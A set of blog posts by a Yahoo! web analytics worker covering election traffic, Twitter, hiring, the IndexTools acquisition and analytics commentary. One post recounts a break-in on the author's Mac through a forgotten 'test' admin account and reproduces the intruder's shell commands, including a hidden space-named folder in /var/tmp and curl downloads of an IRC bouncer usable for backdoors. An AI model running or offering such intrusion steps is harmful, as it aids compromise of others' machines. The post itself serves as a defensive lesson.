Just a quick graph that shows daily page views to Yahoo! News. The green line shows the week before the US elections, while the week of the elections is in blue.
This comes from our internal numbers; for “competitive reasons” I removed the legend indicating volume — but you can see the site was much busier than the previous week. Uniques, PVs, and PVs per unique all were way up.
TechCrunch showed some data from Hitwise on market share of visits for Nov 4. It’s a little strange that Yahoo! wasn’t listed in the TechCrunch graph, even though Yahoo! placed first overall. Also interesting that the Drudge Report was so high. Here are the top 10 .. for more, see Media Life Magazine .
I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.
Oh, and of course, I set it up with full administrator privileges.
Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?
The reason: because somebody else had, three days ago. And changed it.
I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:
3. uname -a
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
See who’s on.
Change the password for user “test”.
See what kind of system this is.
Go to a folder commonly used for temporary files.
Create a folder named ” ” (just a single space).
Change to that folder.
Download a file from the web.
Try the download again.
Give up, and log out.
So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:
curl: (7) Failed to connect to 22.214.171.124: Host is down
So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.
Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:
Do what you can to prevent break-ins.
Log everything so you can figure out how the inevitable break-in happened.
Convenience is often at the expense of security
I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.
I humbly admit all of this in the hope that you can learn from my near miss.
Blogging about Twitter. Reminds me that Talking about music is like dancing about architecture …and I’ve already blogged about Twitter more than once. While we’re a good year and a half into Twitter, and it’s been mildly entertaining, I’m starting to see value now. So this post is for the folks still scratching their heads.
There’s a critical mass (or tipping point, if you are so inclined) of people you need to follow such that a micro-community emerges. Once that happens, you get two things. One is quick notification of important/interesting events/news/blog posts. In fact since I’m following so many web analytics folks, I no longer have to rely on my RSS reader to bring me the big stories — the community points them out. Of course you need to be following the right people for your interests – people who say interesting things.
Second is ability to get feedback. I admit I don’t use this a lot, but it can be handy, depending on your community size. Of course it didn’t help me find a 13-year old copy of Windows…
(In response to Eric’s comment in one of his posts, yeah, my “lazy blogger” tweet to him, welcoming him to Twitter, was paraphrased from something June said to me at eMetrics last spring, about Twitter being the lazy man’s blog. At the time I couldn’t tell if she felt it was a compliment or a condemnation, but now I know.)
What with all the news about Yahoo! laying off people, you could be forgiven for thinking that the company isn’t hiring. But in fact, it is. The company “de-invested” in several areas, but is increasing investment in others. Even the data team changed a number of projects, which impacted some people. But Y! is hiring, and the data team is hiring. In fact we really need help, especially if you know C++ and/or SQL. Details are at http://careers.yahoo.com/
Great read over on the Freakonomics blog with Bill James, the data wizard for the Boston Red Sox. A few choice quotes rang true for me; he could have been talking about web analytics:
I would say generally that baseball statistics are always trying to mislead you, and that it is a constant battle not to be misled by them.
We haven’t figured out anything yet. A hundred years from now, we won’t have begun to have the game figured out.
and to who should have a larger role in player evaluations, scouts or stats guys:
Ninety-five percent scouts, five percent stats. […] the knowledge of who will improve is vastly more important than the knowledge of who is good. Stats can tell you who is good, but they’re almost 100 percent useless when it comes to who will improve.
I’m really jazzed about it. IndexTools is a great group that’s been laser focused on the stuff that customers care about. They have a very practical attitude towards their products. Because they started in 2000, they learned from the pioneers, and built a deep analytics system that really works well. That much was clear as soon as we popped the hood and poked around inside .. unlike a lot of their competition, they didn’t have an old and a new product that they bolted together.
So does this mean we’re going to do “Yahoo! Analytics”, and try to “steal” web sites away from Google Analytics or the commercial web analytics vendors? See, that’s not what this is about. Yahoo! has stated its desire to be a “partner of choice”, and as the new Yahoo! strategy began to sink in, it became clear that the new Yahoo! was going to need to offer a new level of products to its partners. We have many, many thousands of small and medium businesses partnering with us now, and we want to make sure they have the tools they need. We’ve already announced an open strategy where developers can take advantage of Yahoo! products and services; we want to make sure they get the analytics they need too. Yahoo! has so many partners in so many places that can benefit from this technology, it became clear — even obvious — it was now the right thing to do.
Yeah, we still have a team working on analytics solutions for our “owned and operated” world — Yahoo! is too big a customer for IndexTools, or any other commercial vendor for that matter. There’s a world of difference between massive scale for one huge customer, and massive scale for a huge number of small and medium-sized customers. Now we have both.
As for what this means for the web analytics industry, I’ll leave that to the pundits, analysts and fortune tellers.
Here’s some of the combined team after a day of meetings at IndexTools.
(and yes, that’s Dennis at the head of the table, farthest away from the camera.)
In the words of Bill Clinton, “it depends on what you mean by …”
The web analytics is easy / hard discussion among various thought leaders has been interesting but I can’t help but think a little self-serving. I had a long preachy post ready to go but even I was bored by it. Instead, let me offer some observations:
Web data is messy. It doesn’t fit into cubes (think path analysis by segment) for instance. So it requires special handling.
Web data is noisy. Think robots and cookie deletion.
Web analytics is nonstandard. Despite the efforts of the IAB, WAA and others, nobody can say “we use the computation standard to determine this” – because there is no computation standard. Count web 2.0 for me…
If you want to chase the rabbit down the hole, you’ll decide that web analytics is hard. if you want to defer these kinds of things to a tool vendor who will sell you turnkey “best practices” then web analytics is easy.
In business, speed of deployment is king. Thus it’s easier to look at pre-built reports than create them from scratch.
Lack of integration with the business goals means lack of actionability. Most analytics is like driving by looking into the glove box – interesting but irrelevant.
As a result of the first two, there’s an emphasis on quantitative over qualitative analysis — which means there very little “analytics” at all, just metrics trending.
When you don’t first design your analysis from business goals, you grab as much data as you can, and pick and choose the data that supports your hypothesis — either you’re in report hell, or analysis paralysis. For a very visceral example of this, look at how most people do experimentation.
If you design your analytics to meet your strategy, and staff for it, the implementation is long (and complex, yes) but the resulting analytics are easy. If you want to defer to a tool vendor who will sell you turnkey “best practices” then web analytics is hard.
It’s been said that people would rather pull off a finger nail than learn how to leverage their website data. I’ve thought about that a lot lately, and think I have the answer:
A good manicure. French, maybe.
But really, this is all soo sad because the reality is that. . . .
Web Analytics is like a drag queen: It has Really Big Hair, killer eye makeup, and knows how to promote itself:
We believe it, but how do we get to a point where others in the organization do as well?
Step One for each and everyone of us (and you are unique and abnormal in that you read a web analytics blog!) is to accept and recognize the fact that Web Analytics might might be seen as outside the mainstream and a bit freakish. Once you accept then you can move on and do something about it.
I think that’s all the steps required, really!
With extreme apologies to Avinash, and extreme thanks to June.
PS to Jim Sterne: no, I will not. Don’t even ask, ‘K?
Congrats to WebTrends who announced their new CEO today. Dan Stickel is no stranger to the Internet, having done executive stints at Google and AltaVista.
The press release quotes Dan: “The web analytics market is forecast for nearly 20% growth in 2008, and the growth in enterprise marketing software is even greater.” Looks like the gauntlet has been thrown — this looks like a CEO challenge to WebTrends to do better than 20% growth this year.
It’s great to see such a venerable player getting past the cloud of uncertainty. I don’t know anything about WebTrends’ plans, but given Dan’s recent past at Google, expect to see an emphasis on partners.